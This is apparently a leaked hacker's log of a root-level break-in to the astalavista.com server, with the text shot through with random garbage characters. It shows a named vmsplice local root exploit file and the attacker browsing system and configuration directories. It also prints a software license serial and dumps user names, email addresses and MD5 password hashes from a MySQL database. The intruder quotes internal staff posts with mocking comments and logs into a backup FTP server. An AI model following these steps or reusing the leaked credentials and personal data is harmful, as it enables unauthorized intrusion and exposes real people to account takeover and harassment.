+ e7 M8 z- E m! U& Edrwx—— 2 com com 4096 Jun 4 04:04 backups
% w# m! W C3 r& G-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
. f1 |" b b" S( ^% A% jdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system' x y1 h8 x0 R: G. v/ A
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history ?7 @' F% J( H8 h6 C5 i# z
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
d8 H1 E! `6 o, B& b-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile A: Q/ c7 \, D
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc, U# n ~* g C( Z
drwx–x–x 3 com com 4096 Jan 29 2008 domains" q% i, r3 I+ E/ _9 E
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed' L% O4 A( i+ Y# y1 I8 B
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap& w1 P7 e) s( L
-rw——- 1 com com 69 Nov 18 2008 .lesshst! P2 j" [! j w4 y8 T# F
drwx—— 2 com com 4096 Sep 24 2007 mail
9 v8 ?/ _" q: q4 O* h; j6 j-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
& S2 d: h& Y n+ Pdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
% q) m) P4 X( Y- I4 d% ~: d; D2 slrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
* U5 Z1 F3 v4 b! N7 u, ~* N-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
5 M$ E D7 @( j0 J' |! d9 Adrwx—— 2 com com 4096 Aug 26 2008 .ssh
0 @* F, ]8 M2 L% v# n: ^( x-rwx—— 1 com com 8515 Feb 10 2008 t
2 u3 G1 l9 P& O* v0 S-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
9 r& {- ~) r3 y% }, }drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
5 \* t4 F/ J& {9 C-rw-rw-r– 1 com com 617 May 20 2008 .toprc
# A- v2 _% x& }. f-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
6 C+ A9 z: U9 ]$ v+ m$ j" [3 r-rw——- 1 com com 16629 Mar 28 21:46 .viminfo6 G4 }" ~1 Z" S J0 c, G+ K% F
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
d8 ~" t* e7 U% `
0 H# C: J) U7 k/ {6 \/ Bsh-3.2# head t.c
1 j( n" b* P, l5 S+ w0 O$ c/*
& i1 X% V& G) \9 U, i" S8 y1 w* jessica_biel_naked_in_my_bed.c$ k+ \/ R5 |9 P2 H! L
*
; A0 d/ {' A$ g3 C& ?- b* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
. U' u- U" H. A5 m# Y$ x* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca." m8 J: V8 C+ z: B9 E
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
% i. j' }5 r$ S, {7 J*: \6 x8 [8 u+ q, R6 c d
* Linux vmsplice Local Root Exploit* l; V7 z( q/ x+ B
* By qaaz
6 ~$ K% q. C! `: j% j*( N; P# q7 s3 |9 [6 S1 K
$ f8 O- C5 |% E6 u8 y- X1 Hsh-3.2# cd / S) j7 p3 v- ?" A) e, }& M, G
sh-3.2# ls -la# p/ {" p$ Y& ?' A$ z+ G
total 3609 S; Z1 Y6 ?4 J/ f& o$ L* \
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .8 M( X1 S1 M- ~$ y- I5 {& X( }8 R8 S
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, ~ g/ j; H! S0 r8 m-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
1 Y8 {8 T7 j/ s1 Q- @, V: @1 p0 ]7 Y-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
& E S% z: U4 B, P-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db, |0 q" q. H: W9 U
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck2 ^5 H N3 P: G/ V
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel+ D u) H! F! t! B
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup' E) r) k6 [" f- V; i' L
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin7 a* T% y/ [- o* H5 f
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
( f }5 }6 ?9 ` n) Vdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev9 p2 t- j. z% V0 q- G; ~2 `: H
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
6 M$ n! [; k9 ]0 H! A3 L$ Ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 home: Q8 Y8 h- r& c/ [; s) Q* w
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
. v# e8 p9 Q4 \8 x2 Gdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib9 W! T* e- q; n. l+ Z6 C; v
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
$ n7 T5 z/ A: }drwx—— 2 root root 16384 Sep 11 2007 lost+found
: i8 j, a6 [. j0 P& r! ?drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
3 v, x* o9 r' k/ x! |8 S4 O: Mdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc1 m" h7 d& ?) y: o3 `6 F1 M
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt6 m- C6 Y- Q# x2 }) [4 l- r
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg* P' q7 u, Q7 s
drwxr-xr-x 2 root root 0 Jun 3 02:43 net! h( q. o0 Z. j& A+ Q: E
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt [2 r1 i# I" w6 p
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc* P( W5 r/ A1 e6 J( |5 Q5 I1 f
drwxr-x— 15 root root 4096 Jun 4 08:40 root* m# \& {) [9 k1 ]/ M
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
X9 b. b8 \; e+ o% D" @drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
7 i! m) o! s1 D7 F5 hdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
' K* M' b" }) x5 l; s' h$ rdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
( n# u8 E, Q+ c8 }9 Jdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
4 s/ X. @4 C% x Qdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
6 O0 O+ B) a! d, B9 B6 z4 p; F6 V6 Wdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
, b% M/ U) H8 a$ F3 C% i2 a- H- L) B: Q2 U) X
sh-3.2# cd opt- c3 x7 S. z) t: ?2 E7 c
sh-3.2# ls -la
8 `& `7 y$ s1 t+ M1 t* v. ltotal 20" w/ E) o# I! Z. g9 G- f
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
6 v1 d N" S1 z0 ]drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, {- e9 }; S: c1 q1 m9 Wdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
: y2 Y/ H+ ?+ j: U
6 N; m& m& i. @% k4 M; {/ Ssh-3.2# cd lsws/
: H& b U, D- l0 X/ gsh-3.2# ls -la
: C) F8 \" j9 _& T! a( H) |total 108
4 Z7 e& }- b4 C. r& f9 }drwxr-xr-x 15 root root 4096 Mar 20 2008 .
~8 P# G) Y: q; O, ~4 ldrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
/ j4 {, {( c$ v% Q8 ~( Idrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
. l" K6 r6 P+ b: x: m1 a4 i$ M+ @0 N# sdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
$ W6 m# C' k# F4 j7 |1 k: i& g9 wdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
( ^7 i- f- ]* {: k6 x! Ydrwxr-xr-x 2 root root 4096 May 29 15:10 bin9 F3 y( B3 T7 J$ C
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
* L$ L: H- T$ O8 Z* M5 Y( Tdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT- T! L: Q4 u( d
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs+ p: g w+ m+ d) Q' B# C
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin* t+ m6 @- H0 a5 _
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib0 T: z& [0 Z7 Q8 q, ?
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE9 _6 n5 v# g* R- u3 u
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP4 A% B0 b$ q8 K6 P+ P
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
3 ?1 Q: R1 k- F-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP. o9 @0 L% Y: U- e. z
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
8 ]' E+ g6 `! l- Sdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
9 x5 I3 D9 z6 X" _. \drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
& h3 O6 G5 r9 A+ ]drwxr-xr-x 3 root root 4096 Mar 20 2008 share3 R& b5 S6 f1 h5 j9 h. h
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
! z8 t! X( B5 w
! m$ P5 k8 j5 F( e5 I) osh-3.2# cd conf
0 _+ G1 s, m& P+ A5 q5 Msh-3.2# ls -la% _8 i3 c6 m0 f: ~: N6 @
total 48
, r% E& A t& o& Q4 I8 ~$ c Pdrwx—— 4 apache apache 4096 Jun 3 02:43 .
- ?# g& `3 a0 C) \- Ndrwxr-xr-x 15 root root 4096 Mar 20 2008 ..) L$ B: D+ Z" {: h$ J1 a; D
drwx—— 2 apache apache 4096 Mar 20 2008 cert
3 r5 v7 s. g# m4 S( Q: e& t# i-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml; l. p6 f; s; f4 H
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak9 ]1 ?7 h* ]5 `) L' d
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
! a6 e- m1 q; }( y0 s-rw——- 1 apache apache 256 May 29 15:10 license.key
& Z- I2 I- `# A9 C i* E5 W-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
5 z$ T x: }6 [; z-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties" |7 U, f2 H; b0 u5 k
-rw——- 1 apache apache 20 May 29 15:10 serial.no/ V5 {( E4 R/ K( r
drwx—— 2 apache apache 4096 Mar 20 2008 templates
$ D2 c* F& n9 w$ B( e/ |$ F" h6 h& R$ d; F. s, z/ K
sh-3.2# cat serial.no
* K: O0 \: ~2 z' F6 Z1 bIbDl-oVsO-CKqL-wVRa- Z8 x9 |) B+ M. k
$ k+ b9 s; W, V* J" a) Ysh-3.2# mysql
. ~+ m3 \/ I" z$ B4 Q6 dWelcome to the MySQL monitor. Commands end with ; or \g.! d3 A( ~6 J$ |1 W4 [; ~; B
Your MySQL connection id is 286844' _' @' F( v& T1 O; d, g; N/ G; _
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
# ^* f+ x; s% R( L8 ~7 X5 G' o6 I
( l5 ] E# x( ? A9 rType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.0 H& N/ g! i; w2 a
- v7 v8 \( S1 r5 B: M+ T% Bmysql> show databases;
% J/ B3 U: f4 z( p6 j; @& K+———————–+
, Y' k! k1 F9 {6 ] ~| Database |
( Q$ q; B9 A' [' V: x5 e' K0 X3 Z+———————–+
6 g4 S; L/ F' w, g {| information_schema |( e* H4 k0 L& a. V" E
| astanet_ads |0 p$ h1 z+ c% R* X8 J
| astanet_mailing_lists |' I: k3 m4 [/ v' t7 K/ @
| astanet_mediawiki |) u+ W5 t" {1 }
| astanet_membersystem |' s1 x! E5 |- c* v) b
| com_contrexx |
+ A0 a9 s( B& Q4 D6 [| com_contrexx2 |
k3 Q, a6 i* {& P' X* Z4 q| com_contrexx2_live |& `! [. }' @# E! o: c6 y; R4 z* V
| da_roundcube |
$ h: u6 h1 I9 ]8 M; U' L; N( q. L| dolphin |- v5 Z% g* @+ p6 _3 h
| ideapool |
) `9 s! c6 Y$ L% g" L0 n| mysql |0 w- c' O/ I" o- Q8 v) s
| test |
+ y8 _' c6 d+ g0 l, q* m# o x| yourmaster |
6 ^9 R3 K% ], M+ d# S1 \+———————–+4 L$ } W4 @+ ?. _) F3 b
14 rows in set (0.00 sec): |$ s# }& S9 I) C( q; s3 ^
- q: @( G* I! ?% ]mysql> use ideapool$ [5 \; m/ L! W- ?
Database changed
8 H: g g& x$ w/ f0 V6 Z+ Z) bmysql> show tables;/ [" O" ]. A0 t4 _/ i3 a" I0 d( r
+———————————–+
$ W& h( t2 R" o, l$ q| Tables_in_ideapool |7 I9 s& i; X" J; i) F& Q
+———————————–+
9 F9 S+ E4 E c* d& ^5 || eventum_columns_to_display |
6 _2 Q8 f8 ~- W6 `- d/ ]* n| eventum_custom_field |' X6 B- S5 n2 k6 }; T6 W) v
| eventum_custom_field_option |8 d" Y5 o+ p( p2 ^5 Y% R) n
| eventum_custom_filter |1 r/ v! \. r1 Z ^- ~
| eventum_customer_account_manager |
+ V6 q% N3 c; y+ X" e| eventum_customer_note |
/ w2 m7 B( X9 ?6 T| eventum_email_account |, h& f' |/ x* J
| eventum_email_draft |9 N% ^# k& o: X+ w
| eventum_email_draft_recipient |( d5 K6 x" j- [# Q# U, g
| eventum_email_response |$ ]+ @, G' }* X' `0 y l
| eventum_faq |
0 ^ Z3 X) f4 E s| eventum_faq_support_level |( _0 a7 @+ P& c# T9 `' U
| eventum_group |
9 j* O' {# K' x' w& _7 S| eventum_history_type |
) V. o9 j# n$ F| eventum_irc_notice |' ]8 G. K$ U% Z
| eventum_issue |# c, r! n0 i/ Y; |
| eventum_issue_association |
/ z: T! R( w* I1 P| eventum_issue_attachment |
# J) J" `, U: \$ Z. X| eventum_issue_attachment_file |' S- W, X2 c* ~9 ~/ l6 v
| eventum_issue_checkin |
/ v7 ?! G2 G9 q$ d& p* W. P| eventum_issue_custom_field |
. G; f4 f0 w& L! _6 }0 C/ e/ q( o, Y| eventum_issue_history |
/ K: k. M* Y5 Q$ O| eventum_issue_quarantine |
0 ?) T3 k# v( O( L; h0 |4 n, v! t3 \| eventum_issue_requirement |
0 k/ T( `8 d o) h| eventum_issue_user |" I t; X: g H: ?/ M1 X
| eventum_issue_user_replier |1 d' D% u9 N8 q: {- } S5 `7 B% {; D
| eventum_link_filter |
4 h( U7 z: E- b) d| eventum_mail_queue |
+ F! a( B) S' R# `| eventum_mail_queue_log |+ ]( j0 |- s7 W n* g
| eventum_news |& r; m. a9 o9 W$ p* G6 Q
| eventum_note |
3 U2 ^' ]; x8 c; G1 ]9 G( `6 z4 h| eventum_phone_support |
; q3 E2 |* ~7 F/ l# f- H, v" ?| eventum_project |
; r% d8 i( l- K5 S x| eventum_project_category |
" b- \ @5 x; i" ]| eventum_project_custom_field |% _' l4 h4 A2 s. [ [
| eventum_project_email_response |
. |6 ]: u& X$ _" N| eventum_project_field_display | |3 ^7 R f& A% ^
| eventum_project_group |
7 D- Q! q& s* L S' Y+ K y| eventum_project_link_filter |
: J+ s7 `2 b; `& v/ r* N+ }2 v| eventum_project_news |
% M" Y* o3 S* j; h| eventum_project_phone_category |
3 D5 H( [4 f' \- E; V| eventum_project_priority |
2 L7 H3 ~/ {0 [( h5 Y| eventum_project_release |
1 x4 U0 X5 M$ I: c& B% p, g4 o| eventum_project_round_robin |
4 n3 _% X; p9 i4 l. t7 ^| eventum_project_status |8 G+ h$ S2 v0 Z1 M
| eventum_project_status_date |
, [- V3 l; k4 j0 L0 t) s| eventum_project_user |8 l# p' E+ y2 s+ D. }& B
| eventum_reminder_action |
. t$ V* O+ I8 C' I0 s' Z| eventum_reminder_action_list |! m7 K* p5 S5 S8 a8 ?
| eventum_reminder_action_type |
$ f* ?; `3 }* I4 j* [| eventum_reminder_field |* R. |- c/ d+ l8 \2 s& Z. j: h
| eventum_reminder_history |2 M/ a$ G& t) S& u
| eventum_reminder_level |
0 ^1 [7 B* y- k) r+ j3 {5 k| eventum_reminder_level_condition |
2 z4 w1 |$ w- t# T- ]| eventum_reminder_operator |
0 `7 O# }+ n" B| eventum_reminder_priority |! H A. F7 ~ ^8 l& S( X, x# ^
| eventum_reminder_requirement |
! ~0 K+ V; y, f+ W! F. H| eventum_reminder_triggered_action |
! K% \ W1 d D# X; e& Y' m9 || eventum_resolution |
; w5 d: W ~1 h# f$ G| eventum_round_robin_user |$ a& z z; l3 W+ y
| eventum_search_profile |5 U' L5 [5 I! c
| eventum_status |! `7 F- P3 D8 u# _
| eventum_subscription |( X# p9 v9 ~! `- t" F/ O0 M
| eventum_subscription_type |
* {$ J- K" }5 c4 D9 f/ f6 _& i| eventum_support_email |; d3 }5 W* [5 f& {$ x
| eventum_support_email_body |
( r0 _* e' {4 c/ J8 N* Z| eventum_time_tracking |
0 O5 R& p- c! A/ N9 j1 G9 q6 M6 B& F| eventum_time_tracking_category | Y7 K+ o R7 y9 Y5 R% h! W1 ~
| eventum_user |
! V5 @* t( }6 R3 u+———————————–+
! `. W4 Y1 b u: p69 rows in set (0.00 sec)9 _# b$ P& y) T
4 P% x8 p# k+ N; H1 \# e
mysql> describe eventum_user;1 w, G# k, E8 @0 Q: I! o
+————————-+——————+——+—–+———————+—————-+5 \4 k( o# J$ K
| Field | Type | Null | Key | Default | Extra |
% E* ?1 p7 U: }+————————-+——————+——+—–+———————+—————-+
/ \& j' M( [: [8 ?& C2 T| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
4 Y# s* g$ k/ \| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
9 Z4 E+ X" @2 l& H3 r* V3 L| usr_customer_id | int(11) unsigned | YES | | NULL | |; D$ I# c1 j1 e' D/ c$ U2 V4 Q
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |) ^2 [, t4 K( u8 Z8 N; n1 I
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |. u% k- |: M! a# r+ P; ]% Q
| usr_status | varchar(8) | NO | | active | |4 A) l4 C+ s- q! e) _. c
| usr_password | varchar(32) | NO | | | |! E X( s' N1 ]6 m" f6 g$ u
| usr_full_name | varchar(255) | NO | | | |- T; R3 w5 Z4 k' [
| usr_email | varchar(255) | NO | UNI | | |& I" ^8 E' `4 O. t4 e1 m4 O1 S9 K
| usr_preferences | longtext | YES | | NULL | |3 l$ N& A2 f- q& z" ?
| usr_sms_email | varchar(255) | YES | | NULL | |
. `+ j5 o( V. T& Y2 }! [( z( C| usr_clocked_in | tinyint(1) | YES | | 0 | |, t+ X+ b: C' k) q4 ^0 q5 H$ b$ T
| usr_lang | varchar(5) | YES | | NULL | |
+ F7 e5 H: F- O5 D+————————-+——————+——+—–+———————+—————-+
! @ b7 `0 q+ V; P4 I) N0 V! M1 ]13 rows in set (0.00 sec): W) o/ u! H& j# P
) Y1 `0 v5 F; \6 I5 [9 Nmysql> select usr_full_name,usr_email,usr_password from eventum_user;- h9 D, C7 A) I# }( u# m
+———————-+——————————-+———————————-+7 u1 l- {% Y5 w9 u) E
| usr_full_name | usr_email | usr_password |
- V- Z$ H' ^; F$ C8 F6 \2 |7 Y, t4 d3 |+———————-+——————————-+———————————-+6 r7 f) B) O0 O; [" T+ l# X7 l
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |1 T1 |- k0 r( B8 W* f! l
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
% t9 `1 P, y5 C, j4 t0 Z* e# x| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
7 q0 x+ p- H# R; h. R' Z| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
8 }9 t3 p" t/ P0 T3 U- i| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |. l; K! U& E3 R$ B8 n5 X6 B
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |# ]9 H: Y! I0 i$ [6 \( p
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |% d p9 p( F; D. f
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
& V& Q7 G" H) N9 z( C| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
* l- V) D, T3 j5 C E* p| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
, P" Y9 ^; a" N. B7 `. C0 x+ @5 r| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |) E5 r9 ?/ y7 ~ u9 s8 a
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
2 I4 h6 P5 W9 U" P5 [! K| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |* j1 w6 R# x. A& k( D/ D
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |, A5 P7 F9 i# P% m2 K
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
# R8 e. R% q0 d, t+———————-+——————————-+———————————-+
5 t+ ?3 C8 u( G$ s f% l15 rows in set (0.00 sec)% f5 q9 K/ J4 m- @+ M! d! X
) J' G. x7 j. L2 gmysql> select iss_description from eventum_issue where iss_id = 43;
1 @, E* ^. Y5 Q p+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ _' Z7 \: F) V) V
| iss_description
# I" n3 b( I0 ^+ y4 Q& M|
! p- T+ f5 F$ t2 t* J+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
$ K8 E: L& ]/ J( R% c2 m% O| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
$ e% z$ P. U- ^, N+ Jconnected for 90 mins… 120mins… so what i propose is something like:1 t8 E# h& V7 y3 L& ~
链接标记[url]http://www.surfthechannel.com/[/url]1 f# X3 P5 z) [1 i
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system6 N. C& I* J" I8 |
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t9 {1 V. t5 f" _0 X% ]0 F" X- w
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
+ M/ T, G) V. L+ B# Vif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
3 L3 T' j# L1 o) p0 `
0 o$ `& N7 D8 Y* y xWe could also put advertisement during play on the flash video player itself… extra $$…+ W( l6 ]/ p8 s1 u3 ^7 Y. b/ J
; J0 Y! y( s# C) t7 L3 @
By sykadul |! N) P" Z+ ?9 X- d
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+) @6 g( @' X$ C4 {* G
1 row in set (0.00 sec)
9 O$ D. Y- ~* F8 R
! S% q! k% P; }4 E( G/ v1 x// Money and extra $$ is all they care about. remember that.
3 T5 ]1 W1 ]) f. A3 R3 _
) q5 _0 w" M: A6 x# q5 Mmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
$ ]; I+ W L$ s- b8 |8 K; o+————————+——————————————————————————————————————————————————————————————————————————————-+
8 O4 l' u% C$ S! n| iss_summary | iss_description
* }9 T+ n0 Y' l|) v X4 C/ D" a! I6 W
+————————+——————————————————————————————————————————————————————————————————————————————-+
# f( K* {- \' v! l| Forum for REAL EXPERTS | Hello," `+ U2 G" t' I+ z% c# l
0 o( Y5 X# a- R. n: V# }Ishtus and I,
, V% o' k% D/ Y5 d8 V. I% p6 W, O' X
5 _" G- Z' B4 |6 f/ r% |+ KCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
& Z; l9 q9 T, N* j6 ^/ ~ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..) q, L2 N4 W: |( z" B
$ @% G- I! }3 K' E1 [& A' T
One example a friend of mine from coresecurity.com!3 ~( }) o& {' K% i3 A2 j8 p0 I
( d6 p* L/ e1 W1 z
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..0 F6 w/ C7 g! F8 V4 x0 A& ~
" W* T6 m4 x2 X N+ G|: r1 h+ P# v8 L* j4 h; A
+————————+——————————————————————————————————————————————————————————————————————————————+
9 Q" V( f# d3 H, s1 O! o; p6 ]1 row in set (0.00 sec)
# Z/ l( a/ Y# a# g3 Y% K
8 t) U7 Z$ C. q x// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…4 Z4 c& h$ O9 s/ v5 @4 j3 q
9 s* D. [" }3 S1 ]* E p& \mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
9 S' I: x6 K6 e! {% u& M! @% B+——————+———————————————————————————————+
0 z i3 Q& V9 d- Z" R, F) Y) q4 i: D; n| iss_summary | iss_description |
" a2 k5 [/ ]% H1 _4 i0 o+——————+———————————————————————————————+2 G" Z" [* ^" `, R* _ \ [! B
| Website guidance | Virtual Girl which guides you trought the website.
7 @) R6 ]) ]8 |. E$ }* t! G, b8 z6 m( M. R
We need a girl with who you can ( talk )!!!
4 r1 H* q6 Z: \Also for the News!
. A5 h i6 v) ~& `3 o) J* L6 ?So my suggestion is a girl who read you the news loud if you like!: N0 \: p0 C- r* R. f
you can choose between read yourselfe or she read it for you or both!1 a1 E$ T: y+ l+ y+ o* I
6 m, c, v+ x! u$ m2 \2 hGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
O% G% \/ E! C" A/ q
8 ^$ v+ P+ H. V4 iHave a look on the example girls!!& C9 I/ H. K1 I7 `$ B
6 d0 y) y( ~. Q6 U8 s" ^链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]# n* J8 n: s' x7 ^2 l# g
! H' h: E! j$ b$ L& S% x2 B- i2 lor that
; o$ P9 P& E4 \2 {% N. ]/ Q; n% G, q0 e4 s" K3 Z x s
链接标记[url]http://www.yellostrom.de/[/url]& D" y0 U, ], i) n
+ a, U. {. h2 T% H
|" u1 r* _- ? J
+——————+———————————————————————————————+
. z1 B: L( H% i( W& y1 u5 R1 row in set (0.00 sec)' O, {. [4 {9 D% Y+ b- f$ V
7 h' r. M; C5 M, c' F3 S5 {) F
// ha ha.
+ x1 O, v! Z ^3 v, R- l9 B& k, y; E( }4 Y& N
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;% c _9 K, N! K s
+————————–+———————————————————————————————————–+
1 N O# C* z) t' h: B| iss_summary | iss_description | H q( Y# u! b! l# ^2 B; g' W5 U
+————————–+———————————————————————————————————–+
1 [+ U# _, n! T! E, H q2 c( s| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
9 B( n: V; V- Q. P$ N, t) j+————————–+———————————————————————————————————–+
1 `- V/ @) I6 e; a* j; r5 q1 row in set (0.00 sec)' u8 X+ C- O0 x4 q$ C# a, ^
0 v, o' r7 O! o
// LOL.! k9 K; [: ]4 g
9 c* {/ ]1 W! {) n* Xmysql> exit7 O% s- B1 A; f& }
Bye
7 n/ M5 P, ]% }* r8 `: h
# W0 _) x) y2 W2 d8 Y6 P9 ?sh-3.2# ftp 212.254.194.1636 s' i! z2 r3 ]/ G2 `7 S
Connected to 212.254.194.163.
; l- }+ s& M& L4 c& T' F1 a220 BackupCOM_VW FTP server ready.# L# \* a) R9 h/ r" p
504 AUTH: security mechanism ‘GSSAPI’ not supported.3 f/ p2 Q' ]4 h$ M
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
( y4 N: M! ?( p& G0 A6 @KERBEROS_V4 rejected as an authentication type
5 _) d3 D! `+ J' [) LName (212.254.194.163:root): astalavista.com
- R' }7 @# G/ C# A2 {331 Password required for astalavista.com.& p/ a) L M( A. K, a @4 }
Password:
1 I: q" L4 _; A S+ v$ w, B230 User astalavista.com logged in.( K R" e( N9 ?9 t" p: ^2 b
Remote system type is UNIX.5 G& ?+ a, K& N- C% d
Using binary mode to transfer files./ h/ X0 S- w7 Q& {
ftp> ls -la8 p7 A0 R! T# p; v" l5 e
227 Entering Passive Mode (212,254,194,163,2,188)
3 e0 e" o6 I8 g; W% D. `150 Opening BINARY mode data connection for ‘file list’.
+ t, ]$ q" d! v9 |( Zdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com( T: }) ]+ L) G3 l) G" }
226 Transfer complete.- y# }8 q' ?$ |9 \/ H g
ftp> cd astalavista.com
& t! ]! X* N" F. P) I* k* R3 L6 W0 \250 CWD command successful.) X3 o8 m% F' G( T3 @+ S
ftp> ls -la
/ @! A5 T% w% `2 {$ i& s227 Entering Passive Mode (212,254,194,163,2,189)3 [$ S9 f5 R9 P
150 Opening BINARY mode data connection for ‘file list’.
3 b0 _) U' i; v) J+ d- l-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
